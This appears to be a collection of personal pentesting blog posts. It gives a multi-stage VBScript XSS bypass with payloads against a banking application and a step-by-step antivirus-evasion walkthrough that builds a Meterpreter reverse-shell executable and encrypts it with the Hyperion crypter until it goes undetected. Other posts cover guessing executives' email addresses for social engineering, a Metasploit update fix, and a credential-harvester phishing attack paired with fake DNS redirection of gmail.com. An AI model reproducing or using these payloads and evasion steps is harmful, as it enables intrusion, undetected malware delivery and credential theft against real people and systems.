Multi-Stage Payload : Cross Site Scripting Encounter

Hi All,

This blog post is a description of a Cross Site Scripting I found in a Banking Application while testing it. I cannot disclose the name obviously, so you would have to gain trust on me.

Why I am writing a blog post on , "just a XSS", is because i thought this is a bit different from what all we keep finding.

There were quite a number of filters and constraints which kept me indulged in it for some time.

Restriction 1: Tags were not allowed. If you put any input so that it completes a tag, session gets closed. Point to be noticed, Open tag was allowed.

Restriction 2: Whatever stuff you inject with great force, application was reflecting it in Upper case, so dude.. No javascript shit.

Restriction 3: Max Length of 35 characters.

1 Plus Point: Web application was only accessible in IE.

When i started the test, disliked this fact. But by the end, I loved this one. I was trying with VBscript payloads. But the issue of tags and length based was worst.

As there were four input parameters, I thought of breaking my payload into parts and then inject.

 I tried with opening the img src in one input, and then using a single quote trick, took the alert part to next input. So that my payloads being

1st Payload: "><img src='a
2nd Payload: ' onerror=alert(1) size="

So that, whatever comes in between 1st payload and second one, it becomes the value of the src attribute. But, it didn't worked. Reason being, there was already a single quote in between the two reflection points which caused the value to be broken in between only.

In place of single quotes, another idea was a pair of /* and */ . but this didn't worked as well.

3rd option, CDATA, i.e. a pair of <![CDATA[ and ]]>. But this also didn't worked and I later realised this was a stupid one. How can I give a tag inside a tag. Syntactically wrong. 

4th option: To use eval function. so possible payloads: 

1st payload: "><IMG SRC=JAVASCRIPT:ALERT(
2nd Payload: ) ONERROR=ALERT(1) SIZE="

It also didn't worked with an issue. Guess what, javascript is case sensitive. 

But this one popped something cool into my mind. Why not use A href with vbscript, already the application was into IE so all potential victims will be using IE only. 

So i crafted the payloads as :

1st payload: "><A HREF="VBSCRIPT:MSGBOX(1)"
2nd Payload: ">)AAAAA><A"

This time the payload got injected, but didnt gave me any hyperlink on the page except a normal text of "AAAAA". I realized, things were going into two tables, so why not close them using two more parameters. We already have four vulnerable parameters.

 Next set of payloads I tried.

1st Payload: "></TABLE b="
2nd Payload: "></TABLE b="
3rd Payload: "><A HREF="VBSCRIPT:MSGBOX(1)"
4th Payload: ">)AAAAA><A"

I used the left back values of "value" attribute each time into the tag which I was injecting, i.e. in table of A tag.

Result : POP UP.

 You can learn Ehtical Hacking from the Infosec Institute, one of the leading institute in the field of Information Security training:  http://www.infosecinstitute.com/courses/ethical_hacking_training.html

Learn Adobe CQ Pentesting from this resource: http://resources.infosecinstitute.com/adobe-cq-pentesting-guide-part-1/

Bypassing Antivirus with PE Crypters

Well most of the time when we do penetration test, we are facing a super cool AV protection which stops us to execute our lovely EXEs, shellcodes, etc.

I was looking around the same and from a presentation of Mr. Dave Kennedy at DerbyCon, i got something quite useful. He used some words like "shellcodexec" and "PE crypters". On digging it here and there, i found that shellcodexec is a small utility to inject a Shellcode into any process and thus execute your malicious intentions. This is done with approach that when there is no file at all, what signature will AVs match? However shellcodexec is itself getting caught nowadays and therefore I will not suggest you to go for it.

On the other hand, PE Crypters (from Nullsecurity team) will encrypt a Binary file with a sexy crypting approach and thus can be used to bypass the AV.The whole project is running under the name of HYPERION project and is a proper working way to mess around with AVs. So lets start.

Well there has been great stuff for AVs detecting the templates with which we encrypt our EXE and likely the decryption approach of the program to reach the actuall offset, AVs started doing the same with the result of "Detection". In this PE Cryters, payload is not scrambled, instead it is encapsulated. A different key as a cipher is used every time and at the time of execution, Brute Force can be done. So it will take time, huh? Well yeah it will take time if our key is long. We will keep our key short and everything will go fine. This is whot Hyperion Pe Crypters will do; in short. A weak 128 bit AES key is used to encapsulate the packet which is simply brute forced at the time of execution. If you want to give it a hardcore look, check out this research paper (http://www.exploit-db.com/wp-content/themes/exploit/docs/18849.pdf)

Anyways, for super cool guys, this was enough. But as only the Source files are available by now, For those who are new to these things, that can be a little troublesome :P; Well let me give a go through. First of all choose your platform; M preferring Linux all the way but its your system, and your choice too.

Next Download the project;
or use: wget http://nullsecurity.net/tools/binary/Hyperion-1.0.zip









Unzip It. 
unzip Hyperion-1.0.zip






















Change the directory, and compile it.
cd Hyperion-1.0.zip
wine /root/drive_c/MinGW/bin/g++  Src/Crypter/*.cpp -o shubham.exe



Once you have created executable for Crypting, shubham.exe in this case, you can start playing around with EXEs. I am creating a msfpayload for reverse connection and once it is crypted using Hyperion, it must bypass AV along with sending back the reverse connection.

Create the Payload.4
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.242.128 LPORT=4444 X > msf1.exe



Scan it. 
Once the payload is ready, we will scan it first (without crypting).



Lets Crypt it with Hyperion.
wine shubham.exe /root/Desktop/msf1.exe /root/Desktop/msf2.exe
ls -l



Scan it.
No Detection



Execute it.
As soon as you will execute it, it will start brute forcing which will make the CPU Usage 100%.

Enjoy It.
As soon as the brute force will get over, CPU Usage will reduce to normal and a session will get generated.



I hope this was OKAY for you and you enjoyed it. My next post will be about another way to Bypass Antiviruses.

Stay Focused; & Keep exploiting. :)

 You can learn Ehtical Hacking from the Infosec Institute, one of the leading institute in the field of Information Security training:  http://www.infosecinstitute.com/courses/ethical_hacking_training.html

Learn Android Pentesting Part 1 From this resource: http://resources.infosecinstitute.com/android-application-security-testing-guide-part-1/

Contact the CEO of a company with a social approach.

Most of the time when you will send a mail to info@anycompany.com, believe me there are very less number of chances that you will get a good response. Reason being as simple as the number of bounces which you email will get until it reaches the right person. So why not send it directly to the targeted person.

Making my words straighter, don’t you think writing this mail directly to the CEO of that company will do some good? 

I was going through some chrome extensions and got something which can help this deed. Yeah, we can go ahead and get the EMAIL ID of a CEO directly without any co-operation from any Living Body.

So for doing this, you have to count on me (only for about 5 minutes) and do what i say. 

1.   Find out the Person: Go to the site of that company and find out whom you have to deal with, i.e. the person whose email id you will find out. If you are unlucky, you may not get anything. Don't loose hope. Go to Google and give some commands at its search bar. Within in a short span of time, you will hold the name of person whom you have to target. 

2.  Use Rapportive: We will be using Rapportive extension for Reverse Engineering the work, so load your browser with this extension.

3.  Integrate it with Gmail: Once you have installed Rapportive, open Gmail in a new tab and you will see a "rapportive" link coming on your screen.

You can also integrate it with other your other Social Accounts.

 

Reverse Engineer the Email IDs: Finally we have to check out some common combinations like firstname.L@company.com, firstname@company.com, firstname.lastname@company.com, firstname.LE@company.com, f.lastname@company.com. As you will try, you will get the following two responses:

Example: Rapportive Profile Not Found


Example: Rapportive Profile Found

Once you have this, you had got their twitter and other accounts. But the story doesn’t ends up here. For these accounts, you also need to verify them. If it is a twitter account, check the number of their followers. If the profile seems to be active and connections are more than 400, then is must be fine. Reason why I am putting down emphasis on twitter; if you mention anything with @their_twitter_name, it will give a direct notification to them.

Similarly for their LinkedIn account, if they have less than 500 connections that may raise points of issues for whether they use it properly or not? Moreover, whether they accept connections or not?

Google Account can be checked similarly too with the working status of the profile. Sometimes, even phone number is found but don’t get greedy. Don’t make a call until you are a good Social Engineer.

So, with this stuff, I will wish u Best of luck mates. I hope you are not going to mess up.

Msfupdate not working with "no version information available" error.

A few days back while working with my testings and research, i came across an error which was continously depriving me of updating my metasploit framework. Error message was something like this :

(Click on Image to Enlarge)

No version available and blah blah blah. For that, i ignored it for a couple of days due to workload and downloaded exploits manually. But when it seemed kiddish to me, i got into roots. I soon realized that the "no version information available" error , here, meant that the library metasploit does not have a version to refer and hence it is not updating to any further version. Was quite kiddish, but realistic too. So i checked its libraries :

(Click on Image to Enlarge)

libssl.so.0.9.8 do not have a link to /usr/lib/ where as the entire library actually relies on the same. So what we need to do is : 

Backup the library that is erroring msf.

Create a link between the library msf and /usr/lib/

Do this : 

(Click on Image to Enlarge)

Once you are done with all this stuff, go ahead and update your metasploit. You will get a smile on your face.

(Click on Image to Enlarge)

So this was how you dont need to put back your actions if you get any error anywhere, just like in case of msf. 

Enjoy hacking, enjoy exploitation. :)

Email Hacking using Credential Harvester Attack (SET)

Learn how to write your own hacking tools in python:

http://resources.infosecinstitute.com/writing-hacking-tools-with-python-part-1/ 

This video covers the Credential Harvester Attack of Social Engineering Toolkit, which is basically used for making an Automated clone and get credentials of the victim.

I had done it with a small setup of One machine with backtrack installed and other one being XP as the victim.

However a small issue comes with it. Why the victim will open your IP? 

Well simple, get into the DNS server, or create a fake DNS server and DHCP, and start giving IP with your own authorization. Once you are done with fake DNS, make a fake entry for gmail.com poting to your Fake IP address. 

In case any issue comes in between, feel free to contact me at upgoingstaar@gmail.com :)

Stay Focused, Keep Hacking.